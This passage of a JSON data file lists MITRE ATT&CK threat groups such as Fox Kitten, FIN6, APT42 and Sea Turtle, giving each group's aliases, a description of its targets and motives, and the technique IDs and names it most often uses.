Manager"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.008", "name": "Masquerade File Type"}]}, {"name": "Storm-0501", "attack_id": "G1053", "aliases": ["Storm-0501"], "description": "Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1003.006", "name": "DCSync"}, {"id": "T1021.006", "name": "Windows Remote Management"}, {"id": "T1021.007", "name": "Cloud Services"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.009", "name": "Cloud API"}, {"id": "T1078.004", "name": "Cloud Accounts"}, {"id": "T1082", "name": "System Information Discovery"}]}, {"name": "Fox Kitten", "attack_id": "G0117", "aliases": ["Fox Kitten", "UNC757", "Parisite", "Pioneer Kitten", "RUBIDIUM", "Lemon Sandstorm"], "description": "Fox Kitten is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. Fox Kitten has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1021.005", "name": "VNC"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}]}, {"name": "Patchwork", "attack_id": "G0040", "aliases": ["Patchwork", "Hangover Group", "Dropping Elephant", "Chinastrats", "MONSOON", "Operation Hangover"], "description": "Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055.012", "name": "Process Hollowing"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}]}, {"name": "RedCurl", "attack_id": "G1039", "aliases": ["RedCurl"], "description": "RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks. RedCurl is allegedly a Russian-speaking threat actor. The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1039", "name": "Data from Network Shared Drive"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1056.002", "name": "GUI Input Capture"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}]}, {"name": "FIN6", "attack_id": "G0037", "aliases": ["FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest"], "description": "FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1048.003", "name": "Exfiltration Over Unencrypted Non-C2 Protocol"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}]}, {"name": "BRONZE BUTLER", "attack_id": "G0060", "aliases": ["BRONZE BUTLER", "REDBALDKNIGHT", "Tick"], "description": "BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.002", "name": "Right-to-Left Override"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1039", "name": "Data from Network Shared Drive"}, {"id": "T1053.002", "name": "At"}, {"id": "T1053.005", "name": "Scheduled Task"}]}, {"name": "Tropic Trooper", "attack_id": "G0081", "aliases": ["Tropic Trooper", "Pirate Panda", "KeyBoy"], "description": "Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1052.001", "name": "Exfiltration over USB"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}]}, {"name": "APT-C-36", "attack_id": "G0099", "aliases": ["APT-C-36", "Blind Eagle", "TAG-144", "AguilaCiega", "APT-Q-98"], "description": "APT-C-36 is a suspected South American threat group that has engaged in espionage and financially motivated operations since at least 2018. APT-C-36 has targeted government institutions and entities in the financial, energy, and professional manufacturing sectors across Colombia and other Latin American countries.", "top_techniques": [{"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.016", "name": "Junk Code Insertion"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055.012", "name": "Process Hollowing"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}]}, {"name": "HEXANE", "attack_id": "G1001", "aliases": ["HEXANE", "Lyceum", "Siamesekitten", "Spirlin"], "description": "HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.", "top_techniques": [{"id": "T1010", "name": "Application Window Discovery"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1016.001", "name": "Internet Connection Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}]}, {"name": "Rocke", "attack_id": "G0106", "aliases": ["Rocke"], "description": "Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.", "top_techniques": [{"id": "T1014", "name": "Rootkit"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.004", "name": "Compile After Delivery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1037", "name": "Boot or Logon Initialization Scripts"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1053.003", "name": "Cron"}, {"id": "T1055.002", "name": "Portable Executable Injection"}, {"id": "T1057", "name": "Process Discovery"}]}, {"name": "Aquatic Panda", "attack_id": "G0143", "aliases": ["Aquatic Panda"], "description": "Aquatic Panda is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, Aquatic Panda has primarily targeted entities in the telecommunications, technology, and government sectors.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1021", "name": "Remote Services"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}]}, {"name": "TA505", "attack_id": "G0092", "aliases": ["TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO"], "description": "TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1069", "name": "Permission Groups Discovery"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1078.002", "name": "Domain Accounts"}, {"id": "T1087.003", "name": "Email Account"}]}, {"name": "Indrik Spider", "attack_id": "G0119", "aliases": ["Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165"], "description": "Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider initially started with the Dridex banking Trojan, and then by 2017 they began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed their tactics and diversified their toolset.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1074.001", "name": "Local Data Staging"}]}, {"name": "APT42", "attack_id": "G1044", "aliases": ["APT42"], "description": "APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance. The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015. APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices. Finally, APT42 exfiltrates data using native features and open-source tools. APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1056", "name": "Input Capture"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1070", "name": "Indicator Removal"}, {"id": "T1070.008", "name": "Clear Mailbox Data"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}]}, {"name": "Storm-1811", "attack_id": "G1046", "aliases": ["Storm-1811"], "description": "Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake \"help desk\" interaction leading to the deployment of adversary tools and capabilities.", "top_techniques": [{"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1036.010", "name": "Masquerade Account Name"}, {"id": "T1048.002", "name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"}, {"id": "T1056", "name": "Input Capture"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1074.001", "name": "Local Data Staging"}]}, {"name": "GALLIUM", "attack_id": "G0093", "aliases": ["GALLIUM", "Granite Typhoon"], "description": "GALLIUM is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers. Security researchers have identified GALLIUM as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.003", "name": "Rename Legitimate Utilities"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1047", "name": "Windows Management Instrumentation"}]}, {"name": "APT33", "attack_id": "G0064", "aliases": ["APT33", "HOLMIUM", "Elfin", "Peach Sandstorm"], "description": "APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1003.005", "name": "Cached Domain Credentials"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1040", "name": "Network Sniffing"}, {"id": "T1048.003", "name": "Exfiltration Over Unencrypted Non-C2 Protocol"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1078", "name": "Valid Accounts"}]}, {"name": "Sidewinder", "attack_id": "G0121", "aliases": ["Sidewinder", "T-APT-04", "Rattlesnake"], "description": "Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1074.001", "name": "Local Data Staging"}]}, {"name": "Moonstone Sleet", "attack_id": "G1036", "aliases": ["Moonstone Sleet", "Storm-1789"], "description": "Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.009", "name": "Embedded Payloads"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1195.002", "name": "Compromise Software Supply Chain"}]}, {"name": "APT5", "attack_id": "G1023", "aliases": ["APT5", "Mulberry Typhoon", "MANGANESE", "BRONZE FLEETWOOD", "Keyhole Panda", "UNC2630"], "description": "APT5 is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. APT5 has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1053.003", "name": "Cron"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}]}, {"name": "APT37", "attack_id": "G0067", "aliases": ["APT37", "InkySquid", "ScarCruft", "Reaper", "Group123", "TEMP.Reaper", "Ricochet Chollima"], "description": "APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018. North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.001", "name": "Invalid Code Signature"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.006", "name": "Python"}]}, {"name": "ZIRCONIUM", "attack_id": "G0128", "aliases": ["ZIRCONIUM", "APT31", "Violet Typhoon"], "description": "ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.", "top_techniques": [{"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1090.003", "name": "Multi-hop Proxy"}]}, {"name": "LuminousMoth", "attack_id": "G1014", "aliases": ["LuminousMoth"], "description": "LuminousMoth is a Chinese-speaking cyber espionage group that has been active since at least October 2020. LuminousMoth has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between LuminousMoth and Mustang Panda based on similar targeting and TTPs, as well as network infrastructure overlaps.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1030", "name": "Data Transfer Size Limits"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1091", "name": "Replication Through Removable Media"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1112", "name": "Modify Registry"}, {"id": "T1204.001", "name": "Malicious Link"}]}, {"name": "Silence", "attack_id": "G0091", "aliases": ["Silence", "Whisper Spider"], "description": "Silence is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1070.004", "name": "File Deletion"}]}, {"name": "TA2541", "attack_id": "G1018", "aliases": ["TA2541"], "description": "TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.", "top_techniques": [{"id": "T1016.001", "name": "Internet Connection Discovery"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1055.012", "name": "Process Hollowing"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1082", "name": "System Information Discovery"}]}, {"name": "Higaisa", "attack_id": "G0126", "aliases": ["Higaisa"], "description": "Higaisa is a threat group suspected to have South Korean origins. Higaisa has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. Higaisa was first disclosed in early 2019 but is assessed to have operated as early as 2009.", "top_techniques": [{"id": "T1001.003", "name": "Protocol or Service Impersonation"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1029", "name": "Scheduled Transfer"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}]}, {"name": "Sea Turtle", "attack_id": "G1041", "aliases": ["Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON"], "description": "Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.", "top_techniques": [{"id": "T1027.004", "name": "Compile After Delivery"}, {"id": "T1059.004", "name": "Unix Shell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1074.002", "name": "Remote Data Staging"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1078.003", "name": "Local Accounts"}, {"id": "T1114.001", "name": "Local Email Collection"}, {"id": "T1133", "name": "External Remote Services"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1199", "name": "Trusted Relationship"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1213.006", "name": "Databases"}]}, {"name": "Winter Vivern", "attack_id": "G1035", "aliases": ["Winter Vivern", "TA473", "UAC-0114"], "description": "Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.", "top_techniques": [{"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1056.003", "name": "Web Portal Capture"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1071.001", "name": "Web Protocols"}]}, {"name": "WIRTE", "attack_id": "G0090", "aliases": ["WIRTE", "Ashen Lepus"], "description": "WIRTE is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. WIRTE has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. WIRTE has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets.", "top_techniques": [{"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1074.001", "name": "Local Data Staging"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1106", "name": "Native API"}, {"id": "T1114.001", "name": "Local Email Collection"}]}, {"name": "Play", "attack_id": "G1040", "aliases": ["Play"], "description": "Play is a ransomware group that has been active since at least 2022 deploying 